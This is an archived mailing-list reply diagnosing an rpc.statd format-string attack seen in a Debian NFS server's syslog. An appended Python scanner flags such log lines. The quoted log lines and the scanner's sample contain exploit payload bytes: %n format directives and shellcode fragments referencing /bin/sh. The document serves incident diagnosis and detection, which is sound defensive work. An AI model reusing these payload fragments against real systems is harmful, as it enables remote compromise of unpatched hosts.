On Mon, 6 Nov 2000, Rob wrote:
> Getting the following in our /var/log/messages
>
> We use NFS between two Potato boxes, this appears on
> both :
>
> Nov 6 08:03:19 rudy Ç^F/binÇF^D/shA0ÀF^Gv^LV^PN^Ló°^KͰ^AÍèÿÿÿ
> Nov 6 08:03:21 rudy 173>Nov 6 08:03:21 /sbin/rpc.statd[152]: gethostbyname
> error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n1Àë|YA^PA^HþÀA^DÃþÀ^A°fͳ^BY^LÆA^NÆA^H^PI^DA^D^L^A°fͳ^D°fͳ^E0ÀA^D°fÍ
> Nov 6 08:03:21 rudy Ç^F/binÇF^D/shA0ÀF^Gv^LV^PN^Ló°^KͰ^AÍèÿÿÿ

Congratulations! Assuming you haven't patched past the default install, you've just been hacked!

This is a well-known attack on rpc.statd that was first publicized on bugtraq in mid-July (you can search the archives at www.securityfocus.com). If you haven't updated your potato since then, you're probably a goner.

According to the page www.debian.org/security/2000/20000719a if you're running nfs-common 0.1.9.1-1 or later you should be safe. Otherwise reinstall and apt-get the security updates this time.

Damian Menscher
-- 
--==## Grad. student & Sys. Admin. @ U. Illinois at Urbana-Champaign ##==--
--==## <[EMAIL PROTECTED]> www.uiuc.edu/~menscher/ Ofc:(217)333-0038 ##==--
--==## Physics Dept, 1110 W Green, Urbana IL 61801 Fax:(217)333-9819 ##==--
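
A log check for the pattern in the quoted messages, added here as an example and not part of the original thread: it flags rpc.statd "gethostbyname error" entries whose supposed hostname carries printf directives or 8-bit bytes. The function names and the sample lines are constructed for illustration.

```python
import re

# rpc.statd logs the name it failed to resolve; in the quoted entries that
# "name" is attacker-supplied data rather than a hostname.
STATD_ERR = re.compile(
    r"rpc\.statd(?:\[\d+\])?: gethostbyname error for (?P<name>.*)$")
# printf-style conversions (%8x, %236x, %n, ...) never occur in a real hostname.
FMT_DIRECTIVE = re.compile(r"%(?:\d+\$)?\d*[hl]{0,2}[nxXsdup]")


def inspect_line(line):
    """Return the reasons a syslog line looks like the statd probe ([] if none)."""
    m = STATD_ERR.search(line)
    if not m:
        return []
    name = m.group("name").strip()
    reasons = []
    directives = FMT_DIRECTIVE.findall(name)
    if any(d.endswith("n") for d in directives):
        reasons.append("%n write directive in hostname")
    elif directives:
        reasons.append("format directive in hostname")
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in name):
        reasons.append("non-printable or 8-bit bytes in hostname")
    if len(name) > 255:
        reasons.append("hostname longer than 255 bytes")
    return reasons


def scan(lines):
    """Return (line_number, reasons) for every suspicious line."""
    return [(i, r) for i, line in enumerate(lines, 1) if (r := inspect_line(line))]


# Constructed sample input: one suspicious entry, one ordinary resolver
# failure, one unrelated line. Not taken from a real host.
SAMPLE = [
    "Nov  6 08:03:21 hostA /sbin/rpc.statd[152]: gethostbyname error for "
    "\u00f7\u00ff\u00bf%8x%8x%8x%236x%n%137x%n",
    "Nov  6 08:05:02 hostA /sbin/rpc.statd[152]: gethostbyname error for "
    "nfs-client.example.org",
    "Nov  6 08:06:10 hostA kernel: nfs: server hostB OK",
]

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE):
        print(f"line {lineno}: " + "; ".join(reasons))
```

A hit only shows that the request reached the daemon; whether the host was actually compromised depends on the installed nfs-common version, as the reply above says.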